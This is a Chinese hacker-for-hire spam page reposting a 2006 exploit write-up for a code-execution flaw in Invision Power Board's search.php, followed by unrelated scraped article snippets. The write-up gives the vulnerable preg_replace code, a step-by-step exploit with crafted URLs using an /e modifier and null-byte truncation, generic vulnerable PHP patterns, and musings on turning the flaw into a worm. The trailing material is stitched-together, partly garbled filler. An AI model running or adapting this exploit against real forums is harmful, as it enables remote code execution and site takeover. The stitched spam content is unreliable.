24小时接单的黑客 *** 群,黑客 *** 联系方式免费
ipb search.php 漏洞分析及思考 Author:SuperHei_[At]_ph4nt0m.orgBlog:http://superhei.blogbus.com/Team:http://www.ph4nt0m.orgData: 2006-04-27 ###############简单分析################该漏洞又是一个 preg_replace+/e漏洞,代码在\sources\action_admin\search.php 行1258-1262: if ( $this->ipsclass->input['lastdate'] ) { $this->output = preg_replace( "#(value=[\"']{$this->ipsclass->input['lastdate']}[\"'])#i", "\\1 selected='selected'", $this->output ); } } 通过变量input['lastdate']注入/e, $this->output注入shellcode。 ###############利用 *** ################ 注册一个用户,发个贴 内容[shellcode]如下:[ superheixxxxxxxeval(phpinf0()); // 注意最后的;和//之间有一空格 然后点“Search”--->Search by Keywords:superheixxxxxxxeval [记得选择Show results as posts ] 可以得到searchidhttp://127.0.0.1/ipb215/upload/index.php?act=Search&CODE=show&searchid=81a5a928d500c4653647e5b249ab5f53&search_in=posts&resul t_type=posts&highlite=superheixxxxxxxeval 然后在后面加一个&lastdate=z|eval.*?%20//)%23e%00 也就是[/e]提交就ok了: http://127.0.0.1/ipb215/upload/index.php?act=Search&CODE=show&searchid=81a5a928d500c4653647e5b249ab5f53&search_in=posts&resul t_type=posts&highlite=superheixxxxxxxeval&lastdate=z|eval.*?%20//)%23e%00 ###############分析讨论################1. 简单分析: 该漏洞又是一个 preg_replace+/e漏洞,代码在\sources\action_admin\search.php 行1258-1262: if ( $this->ipsclass->input['lastdate'] ) { $this->output = preg_replace( "#(value=[\"']{$this->ipsclass->input['lastdate']}[\"'])#i", "\\1 selected='selected'", $this->output ); } } 通过变量input['lastdate']注入/e, $this->output注入shellcode。 这个分析,掉了一个重要的细节:preg_replace+/e 里有3个参数,只有第2个参数里的代码才可以执行,但是上面的语句貌似是第3个参数提交 的,其实不然,注意上面preg_replace里的第2个参数:\\1 selected='selected' 里面的\\1 为之一参数里正则表达试匹配后的值。归根结底 我们提交的shellcode还是在第2个参数执行了。 2. 注意最后的;和//之间有一空格 这个又是为什么呢?因为我们提交的lastdate=z|eval.*?%20//)%23e%00里是已空格+//为标志的,所以我们提交的shellcode也要有空格+// 3.preg_replace存在null截断漏洞???? 我想这个应该算是php本身一个的漏洞[同以前include的null截断漏洞],我们测试下,把上面的漏洞写个简单的模型:<?$a=$_GET[a];echo preg_replace("#(value=[\"']z|eval.*?//)#e{$a}[\"'])#i ","\\1 ","heigegegxxxxxxxeval(phpinfo());//");?> 我们直接提交http://127.0.0.1/test2.php?a=2出现错误:Warning: Unknown modifier '2' in d:\easyphp\www\test2.php on line 3 提交http://127.0.0.1/test2.php?a=%002 则执行phpinfo(). 我们成功截断了。模型代码执行环境要求gpc=off ,但是在很多的web程序里是 经过变量编码和解码在执行的,所以不受gpc的影响,上面的ipb的就可以在gpc=on的情况下截断。 4."lastdate=z|eval.*?%20//)%23e%00"的构造主要是在this->output里以eval和%20//为标志取\\1 为执行的php代码。 5.worm的利用?还记得Santy吗?就是利用的phpbb里的一个preg_replace,这里会会被利用呢?ipb这个漏洞的利用必须要登陆,但是在ipb注册时候有“图片 认证”,不过据说这个可以编写程序读出来?? 只要突破这个worm是有可能的,毕竟ipb的用户有那么多...... ###############总结模型################1.直接在preg_replace第2个变量执行的模式:<?echo preg_replace("/test/e",$h,"jutst test");?>提交http://127.0.0.1/test/11/preg.php?h=phpinfo()实例如:phpbb的viewtopic.php变量$highliht_match提交php代码执行漏洞 2.通过\\1[或者\\n]提取第3个变量里的php代码并执行的模式:<?echo preg_replace("/\s*\[php\](.+?)\[\/php\]\s*/ies", "\\1", $h);?>提交:http://127.0.0.1/test/11/preg.php?h=[php]phpinfo()[/php] 参考:r57的exp:http://www.milw0rm.com/exploits/1720更多资料:http://www.google.com
相关文章
美冲击国会事件发酵我们结婚了泰民停拍 官员称25人正接受恐怖主义
中新网1月11日电 综合报道,当地时间1月10日,美国陆军部长莱恩·麦卡锡告诉一位民主党籍国会议员,在总统特朗普的支持者6日冲击国会大厦事件后,目前已有至少25人正在接受相关的恐怖主义调查。...
湖北黑客(湖北黑客案中案)
甲壳虫技术论坛怎么了 他比黑鹰还要差,黑鹰起码服务态度还算可以。甲壳虫只要你交了钱 他就不管你了。而且甲壳虫经常被D 经常性的打不开。网站很不稳定。说不定那天就关门了。楼主不怕后悔就加入吧。年10月1...
我的世界菜鸟黑客pk高手黑客(我的世界菜鸟高手黑客的视频)
我的世界怎么玩少年骇客? 1、首先进入我的世界官网,打开“我的世界启动器”。然后打开的页面左侧点击“地图模组”,找到少年骇客模组。最后点击下载,添加模组即可游玩。2、我的世界少年骇客魔族vivo手机安...
黑客改驾龄,支付宝的网络黑客,学习黑客技术入门教程网站
学习完odzhan的文章今后,我产生了一个疑问: return a().StrToLong(str, i); 功能测验需求体现在不断增压状况下的功能体现; }四、实在的cryptojacking事例...
中文在线教育要免费的吗(中文在线教育科技肯
中新网8月24日电 23日下午,中文在线与培生在北京国际图书博览会(BIBF)期间签署了战略合作协议,双方表示将充分整合和发挥双方在教育、出版及教育信息化等方面的资源与优势,为中国中小学基础教育提供优...
广电总局规定片酬多少钱 不得超总成本的四成_电影
【广电总局规定片酬】11月9日,国家广电总局下发通知进一步加强广播电视和网络视听文艺节目管理:坚决遏制追星炒星等不良倾向,严格控制综艺节目嘉宾片酬,加大网络剧治理力度。对于综艺嘉宾片酬,国家广播电视总...
Copyright Your WebSite.Some Rights Reserved.
免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!